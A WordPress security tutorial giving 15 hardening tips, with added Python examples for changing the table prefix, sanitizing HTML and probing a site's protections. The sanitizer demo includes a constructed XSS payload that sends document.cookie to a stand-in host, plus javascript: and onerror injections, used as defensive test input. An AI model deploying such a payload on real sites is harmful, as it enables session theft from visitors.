15 Tips for WordPress Security Without Plugins

How to make a WordPress site more secure is probably the most widely discussed topic on WordPress forums. There are plenty of good security plugins to choose from, but a handful of measures need no third-party tools at all and still noticeably raise the security of a site.

Some of these best practices are performed from the WordPress admin, others from the cPanel of your hosting account or by editing two configuration files: wp-config.php (WordPress settings) and .htaccess (per-directory Apache configuration). Both files sit in the root of your WordPress install, usually the public_html folder. Note that .htaccess rules only take effect on Apache and Apache-compatible servers such as LiteSpeed; nginx ignores the file, so on nginx hosts the same restrictions have to go into the server configuration instead.

In this article, I’ll show you 15 WordPress security tips that don’t require the installation of a plugin.

1. Perform Regular Updates

Where: WordPress admin

The WordPress core team monitors security issues and patches vulnerabilities as they are found. Bug fixes and security patches are offered as updates in the Dashboard > Updates menu of the WordPress admin; minor core releases (the security and maintenance releases) are also installed automatically in the background unless that has been switched off.

Keep the whole site current, not just the WordPress core: plugin and theme authors release security fixes the same way, and outdated plugins are a frequent entry point for attackers.

2. Use the Principle of Least Privilege

Where: WordPress admin

Granting users more privileges than they need is a common WordPress security issue. According to the Principle of Least Privilege (PoLP), a user should have exactly the permissions required to do their job on the site and no more. WordPress ships with a capable role system; a single-site install has five built-in roles:

  1. Subscriber
  2. Contributor
  3. Author
  4. Editor
  5. Administrator

Only grant the Administrator role to people who actually perform admin tasks such as updating plugins, changing settings or installing themes. When you add a new user you select the role from a dropdown list, and the role of an existing user can be changed just as easily on the Users admin page.

Go through the “Roles and Capabilities” table in the WordPress Codex and decide which permissions each of your users really needs; if a user has more than that, change their role. The point is not only that they might abuse the extra permissions: if their account is compromised, the attacker inherits exactly the privileges that account has, so a lower role limits the damage.

3. Change the Default admin Username

Where: WordPress admin

A predictable administrator username, such as the admin that older WordPress installs used by default, makes brute-force attacks easier. Automated attacks target the admin account on many sites at once; they are low-effort attacks that are not aimed at a particular site but simply look for installs that still use the default name. Renaming the account is worth doing, but don’t overrate it: WordPress reveals author slugs through author archive URLs and the REST API, and the slug normally equals the username, so a strong password (tip 4) is what really stops the guessing.

Renaming an account is not straightforward, because WordPress doesn’t allow usernames to be changed from the admin area. You can change user_login directly in the database (change user_nicename as well, since that slug forms the author archive URL), but the simplest route is to create a second administrator with a new username, log in as that user and delete the old one. When WordPress asks what to do with the old user’s content, choose “Attribute all content to” the new account; the other option deletes the posts along with the user.

4. Use Strong Passwords for High-Level Users

Where: WordPress admin

Strong passwords for high-level users are essential to WordPress security. WordPress generates a strong password when a new user is created, but the user can replace it with a weaker one. Make sure your high-level users (administrators and editors) keep strong, unique passwords; if they worry about remembering them, recommend a password manager.

5. Regularly Export Your Content

Where: WordPress admin

If you run a successful WordPress blog, your content is your most valuable asset, and some attacks deface, delete or inject spam into posts, pages and other content. Keep a copy on your local machine or in cloud storage.

You can export your content from the Tools > Export menu in the WordPress admin. Hitting the “Download Export File” button produces an XML (WXR) file. Whenever necessary, you can restore the content by uploading the same file on the Tools > Import admin page. Note that the export covers posts, pages, comments, categories and tags plus references to your media; it does not contain the uploaded files themselves, your settings or your users’ passwords, so it complements rather than replaces a real backup (tip 7).

6. Remove Plugins and Themes You Don’t Need

Where: WordPress admin

Site owners tend to install too many plugins and keep themes they no longer use, which can seriously weaken WordPress security. Every plugin or theme adds code that may contain vulnerabilities, and a deactivated one still sits on disk where its PHP files can often be requested directly, so deactivating is not enough.

Therefore, only use plugins that are really necessary, and delete rather than merely deactivate the ones you don’t need. A site can only run one theme at a time, so there is little reason to keep unused themes installed either (WordPress itself keeps one default theme as a fallback, which is fine to leave). If you need something in the future you can reinstall it in a minute.

7. Regularly Back Up Your Database

Where: cPanel

Besides exporting your content via the WordPress admin, back up the database itself, which also holds your users, settings and plugin options. In cPanel, open the Backup tool in the Files section and download the SQL dump of your WordPress database. If anything goes wrong you can restore the full database from that file. The dump does not include the files under wp-content (uploads, plugins, themes), so take a file backup of those as well; cPanel’s full or home directory backup covers them.

Some hosting plans include automated backups. If you would rather not manage this yourself, consider a plan where the hosting provider takes care of backups, and check occasionally that a restore actually works.

8. Change Your Database Table Prefix

Where: wp-config.php

By default, WordPress uses the wp_ prefix for its database tables. You can choose a different prefix by changing the $table_prefix variable in wp-config.php; the prefix may contain only letters, digits and underscores, and any other character makes it invalid. Be clear about what this buys you: it only trips up canned attacks that blindly assume wp_ (for instance SQL injection payloads written for the default prefix); it does not fix an injection flaw, so treat it as defence in depth. Also, the variable is the easy part. On a new site, set it before running the installer. On an existing site, changing wp-config.php alone breaks the install, because WordPress looks for tables that don’t exist: you must first rename every table to the new prefix and then rewrite the rows that embed the prefix in their data, namely the wp_user_roles option in the options table and the wp_capabilities and wp_user_level keys in usermeta. Take a database backup (tip 7) before you start.
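
The migration described above, as an added example that is not part of the original article: a Python script that performs the prefix change against a constructed, minimal copy of the WordPress schema in an in-memory SQLite database. The table list, the sample rows and the new prefix k9f_ are assumptions for the demonstration; every statement except the catalog query in list_tables() is also valid MySQL/MariaDB, so the same steps carry over to a real database.

```python
"""
Added example for tip 8 (not code from the original article): change the table
prefix of an EXISTING WordPress install. Editing $table_prefix in wp-config.php
is the last step; first the tables are renamed, then the rows that embed the
prefix in their data are rewritten: the 'wp_user_roles' option and the
'wp_capabilities' / 'wp_user_level' user-meta keys. Demonstrated on an
in-memory SQLite copy of a constructed, minimal WordPress schema.
"""
import re
import sqlite3

# Constructed stand-in for a fresh single-site install. The real tables have
# many more columns; these are the tables and rows the procedure must touch.
CORE_TABLES = ["commentmeta", "comments", "links", "options", "postmeta",
               "posts", "term_relationships", "term_taxonomy", "termmeta",
               "terms", "usermeta", "users"]

PREFIX_RE = re.compile(r"^[A-Za-z0-9_]+$")   # the only characters wp-config.php accepts


def valid_prefix(prefix):
    """True when the prefix uses only letters, digits and underscores."""
    return bool(PREFIX_RE.match(prefix))


def like_pattern(prefix):
    """LIKE pattern for names starting with `prefix` ('_' is a wildcard unless escaped)."""
    return prefix.replace("_", r"\_") + "%"


def fresh_install(prefix="wp_"):
    """Create the minimal schema plus the prefix-bearing rows; return the connection."""
    conn = sqlite3.connect(":memory:")
    c = conn.cursor()
    for t in CORE_TABLES:
        if t == "options":
            c.execute(f"CREATE TABLE {prefix}options (option_id INTEGER PRIMARY KEY, "
                      "option_name TEXT, option_value TEXT)")
        elif t == "usermeta":
            c.execute(f"CREATE TABLE {prefix}usermeta (umeta_id INTEGER PRIMARY KEY, "
                      "user_id INTEGER, meta_key TEXT, meta_value TEXT)")
        else:
            c.execute(f"CREATE TABLE {prefix}{t} (id INTEGER PRIMARY KEY)")
    c.executemany(f"INSERT INTO {prefix}options (option_name, option_value) VALUES (?, ?)",
                  [("siteurl", "https://example.test"),
                   (prefix + "user_roles", "a:5:{...}")])      # serialized role table, abbreviated
    c.executemany(f"INSERT INTO {prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
                  [(1, "nickname", "admin"),
                   (1, prefix + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
                   (1, prefix + "user_level", "10")])
    conn.commit()
    return conn


def list_tables(conn, prefix):
    """Tables whose name starts with `prefix` (SQLite catalog query)."""
    # MySQL equivalent: SHOW TABLES LIKE 'wp\_%'
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table' "
                        "AND name LIKE ? ESCAPE '\\' ORDER BY name", (like_pattern(prefix),))
    return [r[0] for r in rows]


def rows_embedding_prefix(conn, prefix):
    """(option names, user-meta keys) starting with `prefix`; WordPress looks these up by name."""
    opts = [r[0] for r in conn.execute(
        f"SELECT option_name FROM {prefix}options WHERE option_name LIKE ? ESCAPE '\\'",
        (like_pattern(prefix),))]
    meta = [r[0] for r in conn.execute(
        f"SELECT meta_key FROM {prefix}usermeta WHERE meta_key LIKE ? ESCAPE '\\'",
        (like_pattern(prefix),))]
    return sorted(opts), sorted(meta)


def change_prefix(conn, old, new):
    """Rename the tables and rewrite the prefix-bearing rows in one transaction."""
    if not (valid_prefix(old) and valid_prefix(new)):
        raise ValueError("table prefix may contain only letters, digits and underscores")
    c = conn.cursor()
    try:
        c.execute("BEGIN")   # SQLite DDL is transactional; MySQL commits DDL implicitly, so dump first
        # 1. Rename every table. Identifiers cannot be bound as parameters; interpolating
        #    them is safe only because valid_prefix() limited them to [A-Za-z0-9_].
        for table in list_tables(conn, old):
            c.execute(f"ALTER TABLE {table} RENAME TO {new}{table[len(old):]}")
        # 2. Role definitions: 'wp_user_roles' must become '<new>user_roles', otherwise
        #    nobody has a role any more and the administrator is locked out.
        for option_id, name in c.execute(
                f"SELECT option_id, option_name FROM {new}options WHERE option_name LIKE ? ESCAPE '\\'",
                (like_pattern(old),)).fetchall():
            c.execute(f"UPDATE {new}options SET option_name = ? WHERE option_id = ?",
                      (new + name[len(old):], option_id))
        # 3. Per-user capabilities and user level carry the prefix in their meta_key.
        for umeta_id, key in c.execute(
                f"SELECT umeta_id, meta_key FROM {new}usermeta WHERE meta_key LIKE ? ESCAPE '\\'",
                (like_pattern(old),)).fetchall():
            c.execute(f"UPDATE {new}usermeta SET meta_key = ? WHERE umeta_id = ?",
                      (new + key[len(old):], umeta_id))
        conn.commit()
    except Exception:
        conn.rollback()
        raise


if __name__ == "__main__":
    db = fresh_install("wp_")
    change_prefix(db, "wp_", "k9f_")          # k9f_ is an arbitrary example prefix
    print(list_tables(db, "k9f_"))
    print(rows_embedding_prefix(db, "k9f_"))
    # Last step on a real site:  $table_prefix = 'k9f_';  in wp-config.php
```

Run it as is to see the renamed tables and the rewritten option and meta rows. To apply the procedure to a live site, point the same statements at your MySQL database (replacing the sqlite_master query with SHOW TABLES LIKE 'wp\_%'), then set $table_prefix to the new value in wp-config.php. MySQL commits DDL implicitly, so the rollback only protects the SQLite demo; on a real database the safety net is the dump from tip 7. Plugins that hard-code wp_ instead of using $wpdb->prefix will break afterwards; that is a bug in the plugin, but one more reason to rehearse on a copy first.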

9. Force Secure Login

Where: wp-config.php

Forcing users to log in to the admin area over HTTPS protects their credentials and session cookies in transit and greatly improves WordPress security. This requires a TLS certificate for your domain. You can buy one from your hosting provider, but many hosting plans now include a free Let’s Encrypt certificate.

With a certificate in place you can serve either just the login and admin area or, better, the whole site over HTTPS (for the whole site, set both addresses under Settings > General to https://). To force the login and the admin area onto https://, add the following line to wp-config.php, anywhere above the “That's all, stop editing!” comment:

define( 'FORCE_SSL_ADMIN', true );

If TLS terminates at a reverse proxy or CDN in front of your server, WordPress sees only the proxy’s plain HTTP request and will redirect to https:// in a loop; in that setup you also have to tell WordPress about the forwarded protocol (the Codex covers this in its notes on administration over SSL), or have the proxy itself enforce HTTPS.

10. Disable Plugin and Theme Modifications

Where: wp-config.php

By default, administrators can edit plugin and theme files from within the WordPress admin through the built-in theme and plugin file editors. Convenient as it is, this turns an admin account into a PHP shell: an attacker who gets hold of an admin session only needs to paste a backdoor into a theme file to execute code on your server.

You can disable the plugin and theme editors for administrators by adding the following line to your wp-config file:

define( 'DISALLOW_FILE_EDIT', true );

If you also want to prevent installing and updating plugins, themes and WordPress core from the admin, use the following constant instead (note that it also switches off automatic background updates):

define( 'DISALLOW_FILE_MODS', true );

There is no need to set both: DISALLOW_FILE_MODS already implies DISALLOW_FILE_EDIT. If you want to keep updating plugins and themes from the WordPress admin, use DISALLOW_FILE_EDIT. If you are prepared to perform every update outside the admin (via SFTP or your deployment process), use DISALLOW_FILE_MODS, but make sure those updates really happen, since tip 1 still applies.

11. Disallow Unfiltered HTML

Where: wp-config.php

WordPress grants administrators and editors (on a single-site install) the unfiltered_html capability, which lets them post arbitrary markup, including <script> tags, in pages, posts, widgets and comments. If one of those accounts is compromised, that becomes persistent cross-site scripting against every visitor and every other logged-in administrator. You can take the capability away from everyone by adding the following rule to your wp-config file:

define( 'DISALLOW_UNFILTERED_HTML', true );

With this set, content from administrators and editors goes through the same KSES filter that already applies to authors and contributors: disallowed tags such as <script> and <iframe> and event-handler attributes such as onclick are stripped (the text inside a stripped tag remains as ordinary text), links with schemes like javascript: lose their URL, and only the allowed subset of HTML still renders. Multisite installs already do this for everyone except the super admin.
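
To make concrete what “filtered” means here, the following is an added example, not code from WordPress or from the original article: a small allowlist sanitizer in Python that follows the same approach as KSES. The allowlist of tags, attributes and URL schemes is constructed for the illustration and is much shorter than WordPress’s real one in wp-includes/kses.php; the hostile input in the demo is likewise constructed.

```python
"""
Added example for tip 11 (not part of the original article): what an allowlist
("KSES style") HTML filter does to content once no account has unfiltered_html.
WordPress's own implementation lives in wp-includes/kses.php and allows more
tags than this; the allowlist below is constructed for illustration.
Standard library only.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist: tag -> attributes that may survive on it.
ALLOWED_TAGS = {
    "a": {"href", "title"},
    "p": set(), "br": set(), "strong": set(), "em": set(), "code": set(),
    "ul": set(), "ol": set(), "li": set(), "blockquote": set(),
}
ALLOWED_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL


def safe_url(value):
    """Accept relative URLs and allowlisted schemes; reject javascript:, data:, vbscript: ..."""
    return urlsplit((value or "").strip()).scheme.lower() in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Keeps allowlisted tags/attributes, drops everything else, escapes all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # <script>, <img>, <iframe>, ... vanish; their text stays
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue                # drops onclick=, onerror=, style=, ...
            if name == "href" and not safe_url(value):
                continue                # drops href="javascript:..."
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    # <br/> style tags: HTMLParser's default calls handle_starttag then handle_endtag.

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))   # text is text, never markup

    # Comments, <!DOCTYPE>, processing instructions etc. hit HTMLParser's
    # no-op default handlers and are dropped.


def sanitize(fragment):
    """Filter one untrusted HTML fragment and return the allowlisted result."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed payload of the kind a compromised editor account might post.
    hostile = ('<p onclick="steal()">Hello <script>fetch("//evil.test/"+document.cookie)</script>'
               '<a href="javascript:alert(1)">click</a></p><img src=x onerror=alert(1)>')
    print(sanitize(hostile))
    # -> <p>Hello fetch("//evil.test/"+document.cookie)<a>click</a></p>
```

The point is the shape of the allowlist: anything not explicitly permitted is dropped, text is always escaped, and URLs are judged by their parsed scheme rather than by searching for the string “javascript”. For production use rely on a maintained sanitizer (WordPress’s own wp_kses_post(), or a vetted library in other stacks) rather than a few dozen lines like these.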

12. Deny Access to Your wp-config File

Where: .htaccess

wp-config.php holds your database name, username and password, the authentication salts and other highly sensitive data. On a correctly working server it is not readable from the browser, because PHP executes it and returns nothing, but that protection disappears whenever PHP handling fails (a misconfiguration, a server migration, a host that suddenly serves .php files as text), and copies such as wp-config.php.bak or wp-config.php~ left behind by an editor or a backup are served as plain text. Denying web access to the file is cheap defence in depth. Add the following snippet to your .htaccess file:

<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>

Place the snippet outside the # BEGIN WordPress / # END WordPress block, for instance at the very top of the file: WordPress rewrites everything between those two markers whenever the permalink settings are saved, so custom rules placed inside them are lost. The Order/Deny syntax shown here is the Apache 2.2 form; it still works on Apache 2.4 when mod_access_compat is loaded (as it is on most shared hosts), otherwise replace the two lines with the single directive Require all denied. If you want backup copies with extra suffixes covered as well, use a FilesMatch block with a pattern anchored on wp-config.php instead of the exact file name.

13. Deny Access to All Your .htaccess Files

Where: .htaccess

You can also block web access to the .htaccess files themselves. They hold Apache configuration, and reading them tells an attacker which protections are in place. Apache’s stock httpd.conf already denies access to any file whose name starts with .ht, but not every host keeps that default, so it is worth checking.

Open http://yoursite.com/.htaccess in your browser (with your own host name): a 403 Forbidden means the file is already protected; if you see its content instead, add the following rule to your .htaccess file. Its pattern only matches names containing .hta, so it covers .htaccess but not .htpasswd; Apache’s own default rule matches .ht* and covers both.

<Files ~ "^.*\.([Hh][Tt][Aa])">
Order Allow,Deny
Deny from all
Satisfy all
</Files>

14. Disable Access to XML-RPC

Where: .htaccess

WordPress exposes an XML-RPC endpoint (xmlrpc.php) used for remote publishing and by some third-party apps. It is also a frequent attack vector: its system.multicall method lets an attacker try hundreds of passwords in a single request, sidestepping per-request rate limits, and the pingback.ping method has been abused to make WordPress sites take part in DDoS attacks against others. If you don’t use any third-party app that needs it, disable XML-RPC by adding the following snippet to your .htaccess file:

<FilesMatch "^(xmlrpc\.php)">
Order Deny,Allow
Deny from all
</FilesMatch>

Note that some popular WordPress plugins such as Jetpack, and the WordPress mobile apps, use the XML-RPC API. If you rely on them, don’t block it. After adding the rule, a GET request to yoursite.com/xmlrpc.php should return 403 Forbidden; an unprotected install answers 405 with the message “XML-RPC server accepts POST requests only.”

15. Disable Directory Browsing

Where: .htaccess

Although many WordPress users don’t realize it, some WordPress directories can be listed in the browser simply by requesting the directory URL: if the directory contains no index file and directory indexes are enabled on the server, Apache shows every file in it.

Public access to your directory tree is harmful to WordPress security. wp-content/uploads/ and many individual plugin and theme folders ship without an index file, so a listing exposes uploaded files you never linked publicly and shows an attacker exactly which plugin files and versions are present, making it easy to pick a matching exploit. You can disable the feature by adding the following line to your .htaccess file (if your host has not allowed Options overrides in .htaccess, the line causes a 500 Internal Server Error; remove it and ask the host to disable indexes in the server configuration instead):

Options -Indexes
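
Rules in .htaccess fail silently when a host ignores the file or when WordPress overwrites the block they were pasted into, so verify from the outside. The following Python script is an added example, not part of the original article: it probes the paths that tips 12 to 15 protect plus the HTTPS redirect from tip 9 and reports pass or fail for each. The backup-file names wp-config.php.bak and wp-config.php~ and the wp-content/uploads/ directory are assumptions chosen for the demonstration; the fetch function is injectable so the logic can be exercised offline against canned responses.

```python
"""
Added example (not part of the original article): check from the outside that
the .htaccess rules from tips 12 to 15 and FORCE_SSL_ADMIN from tip 9 took
effect. Standard library only. `fetch` is injectable so the checks can run
offline against canned responses; the backup-file names and the uploads
directory probed below are assumptions, not something the article lists.
"""
import sys
import urllib.error
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them (we want to see the Location)."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=10):
    """GET url; return (status, lower-cased headers, first 4 KiB of body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "wp-hardening-check/1.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return (resp.status, {k.lower(): v for k, v in resp.headers.items()},
                    resp.read(4096).decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:      # 4xx/5xx and un-followed 3xx land here
        return (err.code, {k.lower(): v for k, v in err.headers.items()},
                err.read(4096).decode("utf-8", "replace"))


def run_checks(base_url, fetch=http_fetch):
    """Run every check against base_url; return {check name: (passed, detail)}."""
    base = base_url.rstrip("/") + "/"
    host_path = base.split("://", 1)[1]
    results = {}

    # Tip 12: wp-config.php plus stray copies editors and backups leave behind (assumed
    # names). Working PHP answers 200 with an empty body for the real file; 403 means the
    # .htaccess rule fired; a body that names DB_PASSWORD is a leak whatever the status.
    for path in ("wp-config.php", "wp-config.php.bak", "wp-config.php~"):
        status, _, body = fetch(base + path)
        leaked = "DB_PASSWORD" in body
        results[f"{path} not disclosed"] = (
            not leaked, f"HTTP {status}" + (" and body contains DB_PASSWORD" if leaked else ""))

    # Tip 13: Apache's default already denies .ht*; the rule restores that if a host dropped it.
    status, _, _ = fetch(base + ".htaccess")
    results[".htaccess not readable"] = (status in (403, 404), f"HTTP {status}")

    # Tip 14: an unblocked xmlrpc.php answers GET with 405 "accepts POST requests only".
    status, _, _ = fetch(base + "xmlrpc.php")
    results["xmlrpc.php blocked"] = (status in (403, 404), f"HTTP {status}")

    # Tip 15: mod_autoindex titles its listing page "Index of /...".
    status, _, body = fetch(base + "wp-content/uploads/")
    listed = status == 200 and "Index of" in body
    results["no listing of wp-content/uploads/"] = (
        not listed, f"HTTP {status}" + (", directory listing shown" if listed else ""))

    # Tip 9: with FORCE_SSL_ADMIN a plain-HTTP login request must redirect to https.
    status, headers, _ = fetch("http://" + host_path + "wp-login.php")
    location = headers.get("location", "")
    results["wp-login.php redirects to https"] = (
        status in (301, 302, 307, 308) and location.lower().startswith("https://"),
        f"HTTP {status} -> {location or '(no Location header)'}")
    return results


def all_passed(results):
    """True when every check passed."""
    return all(ok for ok, _ in results.values())


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: wp_hardening_check.py https://yoursite.example")
    report = run_checks(sys.argv[1])
    for name, (ok, detail) in report.items():
        print(f"{'PASS' if ok else 'FAIL'}  {name}: {detail}")
    sys.exit(0 if all_passed(report) else 1)
```

Run it as python3 wp_hardening_check.py https://yoursite.example. A PASS for wp-config.php with HTTP 200 means PHP executed the file without leaking it; HTTP 403 means the rule from tip 12 is doing its job. A 405 on xmlrpc.php is the tell-tale sign of an unprotected endpoint, and a 200 on the uploads directory whose body contains “Index of” means directory listing is still on.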

Learn More about WordPress Security

Putting security best practices into use is a crucial part of WordPress site management, but there are many other security-related tasks you may want to take on. To learn more about WordPress security, check out our articles on the best two-factor authentication and backup plugins, or read our guide on how to identify WordPress vulnerabilities.